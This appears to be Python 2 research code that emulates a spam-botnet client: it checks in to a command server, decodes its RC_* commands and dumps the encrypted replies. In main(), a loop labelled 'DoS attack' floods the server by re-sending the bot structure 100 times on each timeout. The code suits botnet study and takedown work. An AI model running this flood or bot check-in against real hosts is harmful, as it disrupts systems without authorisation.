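def process_package(rcvmsg, rtt=0, dbg=False, print_cmd=True):
    """Interpret one server packet and act on the RC command it carries.

    Packet layout as read here: bytes 0-3 hold a native-order signed 32-bit
    command code (RC_* 1..9); bytes 4-7 are not read; anything from byte 8 on
    is an encrypted payload handed to pdecrypt(). For RC_BID the decrypted
    payload is expected to hold the BID at offset 0 and sign.timer at offset 8.

    rcvmsg comes straight off the socket, so every field is length-checked
    before it is unpacked: a packet shorter than the 4-byte header, or an
    RC_BID payload shorter than 12 bytes, is reported (when dbg) and skipped
    instead of raising struct.error / NameError.

    Args:
        rcvmsg: raw packet bytes received from the server.
        rtt: measured round-trip time in seconds, echoed in the status line.
        dbg: also print the decrypted payload and the parsed BID/timer.
        print_cmd: print the "[+] Received ..." status line and command name.

    Returns:
        The assigned BID (int) for a well-formed RC_BID packet, else None.
    """
    # Untrusted network input: never unpack a header that is not there.
    if len(rcvmsg) < 4:
        if dbg:
            cprint("[-] Packet too short for a command header ("
                   + str(len(rcvmsg)) + " bytes)", "yellow")
        return None

    cmd = struct.unpack("i", rcvmsg[0:4])[0]  # struct.unpack() returns a tuple
    if cmd not in range(1, 10):
        return None

    if print_cmd:
        sys.stdout.write("[+] Received (RTT: " + str(rtt * 1000)
                         + "ms, Pkg size: " + str(len(rcvmsg)) + "): ")
        name = _rc_command_name(cmd)
        if name is not None:
            cprint(name, "cyan")

    # Decrypt the payload (if any); dec stays empty for header-only packets.
    dec = ""
    if len(rcvmsg) > 8:
        dec = pdecrypt(rcvmsg[8:], len(rcvmsg[8:]))
        if dbg:
            cprint("Decrypted:\n" + hexdump(dec), "yellow")

    # Command actions
    if cmd == RC_BID:
        # BID at [0:4] and sign.timer at [8:12] -> need at least 12 bytes.
        if len(dec) < 12:
            if dbg:
                cprint("[-] RC_BID payload too short ("
                       + str(len(dec)) + " bytes), ignoring", "yellow")
            return None
        bid = struct.unpack("i", dec[0:4])[0]
        timer = struct.unpack("i", dec[8:12])[0]
        if dbg:
            cprint("[+] Assigned BID: " + str(bid)
                   + ", Timer: " + str(timer), "green")
        return bid

    return None


def _rc_command_name(cmd):
    """Return the RC_* constant name for *cmd*, or None if it matches none.

    The pairs are checked in order so that, like the original if/elif chain,
    the first matching constant wins should two RC_* values coincide.
    """
    table = (
        (RC_SLEEP, "RC_SLEEP"),
        (RC_GETWORK, "RC_GETWORK"),
        (RC_RESTART, "RC_RESTART"),
        (RC_UPDATE, "RC_UPDATE"),
        (RC_BID, "RC_BID"),
        (RC_TEMPLATE, "RC_TEMPLATE"),
        (RC_CONFIG, "RC_CONFIG"),
        (RC_MAILFROM, "RC_MAILFROM"),
        (RC_ACCOUNTS, "RC_ACCOUNTS"),
    )
    for value, label in table:
        if cmd == value:
            return label
    return None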
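def get_bid(s):
    """Receive on *s* until an RC_BID packet arrives and return its BID.

    Packets whose command code is not RC_BID are skipped. Because the data is
    untrusted network input, a packet shorter than the 4-byte command header,
    or an RC_BID payload that decrypts to fewer than 4 bytes, is skipped as
    well instead of raising struct.error. A socket.error (which includes
    socket.timeout) is reported on stdout and the receive is retried, as in
    the original; a peer that never answers therefore keeps this loop alive.

    Args:
        s: a connected socket-like object exposing recv(bufsize).

    Returns:
        The BID (int) from the first well-formed RC_BID packet, or None when
        the peer closes the connection first.
    """
    while True:
        try:
            rcvmsg = s.recv(1024)
        except socket.error as e:
            # Same "[-] <error>" line the original printed; retry as before.
            sys.stdout.write("[-] " + str(e) + "\n")
            continue

        # Empty read means the peer closed the connection ("" on Python 2,
        # b"" on Python 3 - `not rcvmsg` covers both).
        if not rcvmsg:
            break

        if len(rcvmsg) < 4:
            continue  # no complete command header yet
        cmd = struct.unpack("i", rcvmsg[0:4])[0]
        if cmd != RC_BID:
            continue

        # Decrypt the payload that follows the 8-byte header.
        dec = pdecrypt(rcvmsg[8:], len(rcvmsg[8:]))
        if len(dec) < 4:
            continue  # BID field missing from the decrypted payload
        return struct.unpack("i", dec[0:4])[0]

    return None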
def main():
    """Entry point: emulate one bot check-in against HOST:PORT and dump the replies.

    Connects with a 3 s receive timeout, fills a BOT_RHEADER, encrypts it with
    pencrypt() and embeds it in a BOT_INFO structure, sends that structure 100
    times back-to-back, then loops: each chunk received is labelled by its
    first byte, hexdumped and appended to ``buf``; on every receive timeout
    ``buf`` is decrypted, printed and cleared (and, as laid out here, the same
    100x payload is sent again). The loop ends only when the peer closes the
    connection; Ctrl+C is not caught, so it skips the final close().

    Python 2 code: relies on ``buffer``, ``print`` statements and ``str``
    sockets. HOST, PORT, the RC_* codes, the ctypes structures and
    pencrypt/pdecrypt/hexdump/cprint are defined elsewhere in the file.
    """
    # Socket configurations
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # SO_REUSEADDR only affects bound/listening sockets; harmless on a client.
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.settimeout(3.0) # Set 3s timeout; drives the socket.timeout branch below
    # Connect
    s.connect((HOST, PORT))
    cprint("\n[*] Sending data to " + HOST + " : " + str(PORT) \
        + " (hexdump below)\n", "green")
    # Initialise bot_info, bot_rheader, botbulk_info structures
    bot_info = BOT_INFO()
    bot_rheader = BOT_RHEADER()
    botbulk_info = BOTBULK_INFO()
    # Populate bot_rheader structure
    bot_rheader.bid = 0
    # 2886783745 == 0xAC10D301, i.e. 172.16.211.1 (same address as bot_info.ip)
    bot_rheader.iplocal = 2886783745 # Should be INT
    bot_rheader.botver = 116
    bot_rheader.confver = 1
    bot_rheader.mfver = 1
    bot_rheader.winver = 1
    bot_rheader.flags = 1
    bot_rheader.smtp = 1
    bot_rheader.size = 32
    # Conversion: Structure -> Bytes (Str)
    #bot_info.bufrecv = buffer(bot_rheader)[:] # Same as pack()
    bufrecv = buffer(bot_rheader)[:]
    bufrecv_enc = pencrypt(bufrecv, len(bufrecv)) # Try encrypting
    # Populate bot_info structure
    # Octal escapes: 0254.020.0323.01 == 172.16.211.1 (private RFC 1918 range)
    bot_info.ip = "\254\020\323\001" # char[4]
    #bot_info.have_ip = 1
    bot_info.bufrecv = bufrecv_enc
    bot_info.bufsize = 32
    bot_info.bid = 0
    # The string below is a no-op expression statement used as a block
    # comment: the remaining BOT_INFO fields are left at their defaults.
    """
    bot_info.bufsend = ""
    bot_info.bufdata = ""
    bot_info.bufsmall = 10000
    bot_info.id = 0
    bot_info.sd = 5
    bot_info.timer = 2
    bot_info.state = 2
    bot_info.blackliststatus = 0
    bot_info.bshcommand = 0
    bot_info.flags = 0
    bot_info.botbulk = pointer(botbulk_info)
    # Statistics
    bot_info.bsent = 0
    bot_info.bnouser = 0
    bot_info.bunlucky = 0
    bot_info.bunksmtpansw = 0
    bot_info.bblacklisted = 0
    bot_info.bmailfrombad = 0
    bot_info.bgraylisted = 0
    bot_info.bnomx = 0
    bot_info.bnomxip = 0
    bot_info.bnoaliveip = 0
    bot_info.bsmtptimeout = 0
    bot_info.bconnect = 0
    bot_info.brecv = 0
    bot_info.bbotmailtimeout = 0
    bot_info.bspammessage = 0
    bot_info.bnohostname = 0
    bot_info.blckmx = 0
    bot_info.captcha_good = 0
    bot_info.captcha_total = 0
    refbulk = (c_byte * 4)()
    bot_info.refbulk = cast(refbulk, POINTER(c_int))
    bot_info.refbulk_size = 0
    """
    # Send: the raw structure bytes, hexdumped once, then sent 100 times
    print hexdump(buffer(bot_info)[:])
    s.sendall(buffer(bot_info)[:] * 100)
    # NOTE(review): the collapsed source breaks this literal across two
    # lines; reconstructed here as a backslash continuation - confirm the
    # original text.
    cprint("[+] Sent! \
Now waiting to receive data...\n", "green")
    # Initialise recv buffer
    buf = ""
    # Listen on host
    while True:
        try:
            # Try receiving data
            rcvmsg = s.recv(1024)
            # Check whether connection is closed (Python 2: recv returns str)
            if rcvmsg == "":
                break
            # Got some data!
            sys.stdout.write("[+] Received: ")
            # Interpret command.
            # NOTE(review): only the first byte is read here, whereas
            # process_package() unpacks a 4-byte "i" at [0:4]; the two agree
            # only for small codes on little-endian hosts - worth unifying.
            cmd = ord(rcvmsg[0])
            if cmd == RC_SLEEP: cprint("RC_SLEEP", "cyan")
            elif cmd == RC_GETWORK: cprint("RC_GETWORK", "cyan")
            elif cmd == RC_RESTART: cprint("RC_RESTART", "cyan")
            elif cmd == RC_UPDATE: cprint("RC_UPDATE", "cyan")
            elif cmd == RC_BID: cprint("RC_BID", "cyan")
            elif cmd == RC_TEMPLATE: cprint("RC_TEMPLATE", "cyan")
            elif cmd == RC_CONFIG: cprint("RC_CONFIG", "cyan")
            elif cmd == RC_MAILFROM: cprint("RC_MAILFROM", "cyan")
            elif cmd == RC_ACCOUNTS: cprint("RC_ACCOUNTS", "cyan")
            print hexdump(rcvmsg)
            # Store data in buffer (for later use); decrypted on next timeout
            buf += rcvmsg
        except socket.timeout:
            # Timed out on receiving data:
            # Let's check out the contents of recv buffer (if not empty)
            if buf:
                # Decrypt recv buffer
                dec = pdecrypt(buf, len(buf))
                print "[+] Decrypted:\n", dec, "\n"
                # Clear recv buffer
                buf = ""
            cprint("[*] Listening for incoming data (press Ctrl+C to quit)\n" \
                , "green")
            # DoS attack
            # NOTE(review): the collapsed source does not show whether this
            # re-send sits inside the timeout handler (as laid out here) or
            # after the loop; confirm against the original file.
            s.sendall(buffer(bot_info)[:] * 100)
    # Close socket (reached only after the peer closes; Ctrl+C skips it)
    s.close()